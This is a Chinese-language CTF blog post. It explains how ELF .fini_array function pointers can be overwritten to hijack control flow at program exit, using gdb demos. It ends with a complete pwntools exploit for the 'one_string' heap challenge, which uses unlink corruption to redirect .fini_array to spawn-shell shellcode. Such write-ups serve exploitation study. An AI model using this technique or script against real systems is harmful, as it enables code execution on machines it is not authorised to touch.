0x1 写在前面

本篇博客的原理分析部分大篇幅引用了Chris大佬的文章,具体文章链接请参考文末。

本文以[中关村2019]one_string为例题。

0x2 关于.fini_array段

大多数可执行文件是通过链接 libc 来进行编译的,因此 gcc 会将 glibc 初始化代码放入编译好的可执行文件和共享库中。 .init_array.fini_array 节(早期版本被称为 .ctors和 .dtors )中存放了指向初始化代码和终止代码的函数指针。 .init_array 函数指针会在 main() 函数调用之前触发。这就意味着,可以通过重写某个指向正确地址的指针来将控制流指向病毒或者寄生代码。 .fini_array 函数指针在 main() 函数执行完之后才被触发,在某些场景下这一点会非常有用。例如,特定的堆溢出漏洞(如曾经的 Once upon a free())会允许攻击者在任意位置写4个字节,攻击者通常会使用一个指向 shellcode 地址的函数指针来重写.fini_array 函数指针。对于大多数病毒或者恶意软件作者来说, .init_array 函数指针是最常被攻击的目标,因为它通常可以使得寄生代码在程序的其他部分执行之前就能够先运行。

Demo 1

我们看一个程序

#include <stdio.h>
#include <stdlib.h>


static void start(void) __attribute__ ((constructor));
static void stop(void) __attribute__ ((destructor));


int main(int argc, char *argv[])
{
    printf("start == %p\n", start);
    printf("stop == %p\n", stop);
    return 0;
}


void start(void)
{
    printf("hello world!\n");
}


void stop(void)
{
    printf("goodbye world!\n");
}

gcc为函数提供了几种类型的属性,其中两个是我们特别感兴趣的:构造函数(constructors)和析构函数(destructors)。程序员应当使用类似下面的方式来指定这些属性:

static void start(void) __attribute__ ((constructor));
static void stop(void) __attribute__ ((destructor));

带有”构造函数”属性的函数将在main()函数之前被执行,而声明为”析构函数”属性的函数则将在_after_ main()退出时执行。

程序运行结果如下:

img

现在我们试试 objdump -h ./test

chris@ubuntu:~$ objdump -h test


test:     file format elf64-x86-64


Sections:
Idx Name          Size      VMA               LMA               File off  Algn


 17 .init_array   00000010  0000000000600e00  0000000000600e00  00000e00  2**3
                  CONTENTS, ALLOC, LOAD, DATA
 18 .fini_array   00000010  0000000000600e10  0000000000600e10  00000e10  2**3
                  CONTENTS, ALLOC, LOAD, DATA

可以看到.init_array的地址为 0x600e00 , .fini_array的地址为 0x600e10

在gdb中分别对这两个地址跟踪一下

pwndbg> x/2xg 0x600e00 
0x600e00:    0x0000000000400550    0x00000000004005bb
pwndbg> x/2xg 0x600e10
0x600e10:    0x0000000000400530    0x00000000004005cb

分析一下结果,这里我只分析.fini_array,我们可以看到 0x600e10 中存了 0x0000000000400530 与 0x00000000004005cb

明显0x00000000004005cb是stop函数的函数指针,0x0000000000400530 同样也是一个函数指针 我们后面再讨论。

Demo 2

下面我们就着重讨论一下0x0000000000400530,其实它指向一个函数__do_global_dtors_aux,这里我就直接说结果了 :

在程序结束时,__do_global_dtors_aux也就是0x0000000000400530这个函数指针会被实现

我们再看一个例子,其实就是前面的test程序函数少了属性,我把它定义成静态函数:

#include <stdio.h>
#include <stdlib.h>


static void start(void);
static void stop(void);


int main(int argc, char *argv[])
{
    printf("start == %p\n", start);
    printf("stop == %p\n", stop);

    return 0;
}


void start(void)
{
    printf("hello world!\n");
}


void stop(void)
{
    printf("goodbye world!\n");
}

同样编译和运行:

chris@ubuntu:~$ gcc -o test2 test2.c
chris@ubuntu:~$ ./test2
start == 0x4005bb
stop == 0x4005cb

函数地址并没有变化,但是因为start/stop函数未设定析构与构造属性,所以没有在开始和结束时被调用。

我们试试 objdump -h ./test2

chris@ubuntu:~$ objdump -h test2


test:     file format elf64-x86-64


Sections:
Idx Name          Size      VMA               LMA               File off  Algn


17 .init_array   00000008  0000000000600e10  0000000000600e10  00000e10  2**3
                  CONTENTS, ALLOC, LOAD, DATA
18 .fini_array   00000008  0000000000600e18  0000000000600e18  00000e18  2**3
                  CONTENTS, ALLOC, LOAD, DATA

可以看到.init_array的地址为 0x600e10 , .fini_array的地址为 0x600e18,和test程序有点偏差。

现在我用gdb跟踪一波,查看一下.fini_array

pwndbg> x/2xg 0x600e18
0x600e18:    0x0000000000400530    0x0000000000000000

明显0x0000000000400530后面的函数指针没有被填充 是0x0000000000000000,所以程序结束后不会执行stop函数

现在我们控制程序执行流程,怎么控制呢?我把.fini_array的函数指针0x0000000000400530覆盖成stop函数的地址

pwndbg> set {int}0x600e18=0x4005cb
pwndbg> x/2xg 0x600e18 
0x600e18:    0x00000000004005cb    0x0000000000000000

输入c继续执行程序

pwndbg> c
Continuing.
start == 0x4005bb
stop == 0x4005cb
goodbye world!
[Inferior 1 (process 3920) exited normally]

bingo,成功执行了stop函数,如果stop函数是一段shellcode我们就可以直接拿下shell

分析与总结

我们来关心一下,上面的stop在什么地方被调用。

栈回溯跟踪看一下

►  0x4005cb <stop>                 push   rbp
   0x4005cc <stop+1>               mov    rbp, rsp
   0x4005cf <stop+4>               mov    edi, 0x40068a
   0x4005d4 <stop+9>               call   puts@plt <0x400450>


   0x4005d9 <stop+14>              pop    rbp
   0x4005da <stop+15>              ret    


   0x4005db                        nop    dword ptr [rax + rax]
   0x4005e0 <__libc_csu_init>      push   r15
   0x4005e2 <__libc_csu_init+2>    mov    r15d, edi
   0x4005e5 <__libc_csu_init+5>    push   r14
   0x4005e7 <__libc_csu_init+7>    mov    r14, rsi
────────────────────────────────────────[ STACK ]────────────────────────────────────────────
00:0000│ rsp     0x7fffffffdcd8 —▸ 0x7ffff7dea7da (_dl_fini+474) ◂— test   r14d, r14d
01:0008│ r8 r15  0x7fffffffdce0 —▸ 0x7ffff7ffe1c8 ◂— 0x0
02:0010│         0x7fffffffdce8 —▸ 0x7ffff7ffe760 —▸ 0x7ffff7ffa000 ◂— jg     0x7ffff7ffa047
03:0018│         0x7fffffffdcf0 —▸ 0x7ffff7fe0000 —▸ 0x7ffff7a11000 ◂— jg     0x7ffff7a11047
04:0020│         0x7fffffffdcf8 —▸ 0x7ffff7ffd9f8 (_rtld_global+2456) —▸ 0x7ffff7dda000 ◂— jg     0x7ffff7dda047
05:0028│         0x7fffffffdd00 ◂— 0x1
06:0030│         0x7fffffffdd08 —▸ 0x7ffff7dea68d (_dl_fini+141) ◂— mov    rax, qword ptr [rbp - 0x40]
07:0038│         0x7fffffffdd10 ◂— 0x0
────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────
 ► f 0           4005cb stop
   f 1           7ffff7dea7da _dl_fini+474
   f 2           7ffff7a4d1a9 __run_exit_handlers+217
   f 3           7ffff7a4d1f5
   f 4           7ffff7a32f4c __libc_start_main+252
   f 5           4004b9 _start+41
Breakpoint *0x4005cb

看到返回地址在_dl_fini+474,所以可以得出结论,.fini_array区节的第一个函数指针在程序结束时,由_dl_fini函数调用,所以我们可加以利用。在未开启PIE的情况下,只需实现一个任意地址写,将.fini_array区节的第一个函数指针改写成后门地址或者one_gadgets,在程序结束时便能控制流程

0x3 以CISCN_2019_ES_PWN_3为例

image-20191219202246195

无保护的全静态文件。

漏洞点分析

image-20191219202403594

edit函数中会在edit结束后使用strlen函数修改可输入的长度。

在chunk空间复用的情形下,填满chunk会导致下一个chunk的size域也被纳入可修改的区段,进而可以触发unlink漏洞。

然后就可以劫持.fini.array段到shellcode进而完成利用。

EXP

from pwn import *
import sys
context.log_level='debug'
# context.arch='amd64'

# file_name=ELF("./")
# libc=ELF("./")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./one_string")
def creat(chunk_size,value):
    sh.sendline('1')
    sh.sendline(str(chunk_size))
    sh.sendline(value)

def delete(index):
    sh.sendline('2')
    sh.sendline(str(index))

def edit(index,value):
    sh.sendline('3')
    sh.sendline(str(index))
    sh.sendline(value)

target_addr= 0x80EBA40 + 12
fd=target_addr - 0x4 * 3
bk=target_addr - 0x4 * 2
fake_chunk= p32(0xdeadbeef) # prev_size
fake_chunk+=p32(0x41) # size
fake_chunk+=p32(fd)+p32(bk)
fake_chunk+='a'*0x30 + p32(0x40) + '\x48' #padding

shellcode=asm(shellcraft.sh())

sh.recvuntil("You know all, Please input:")
creat(0x44,'Chunk0')
creat(0x44,'Chunk1')
creat(0x44,'Chunk2')
creat(0x44,'Chunk3')
creat(0x40,'Chunk4')
creat(0x44,'Chunk5')
edit(3,'A'*0x44)
edit(3,fake_chunk)
delete(4)
edit(3,p32(0x80e9f74))
edit(0,p32(0)+p32(0x80e9f7c)+shellcode+'\x00')
sh.sendline('4')
sh.interactive()

0x4 参考链接

重写.fini_array函数指针

分类: CTF

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注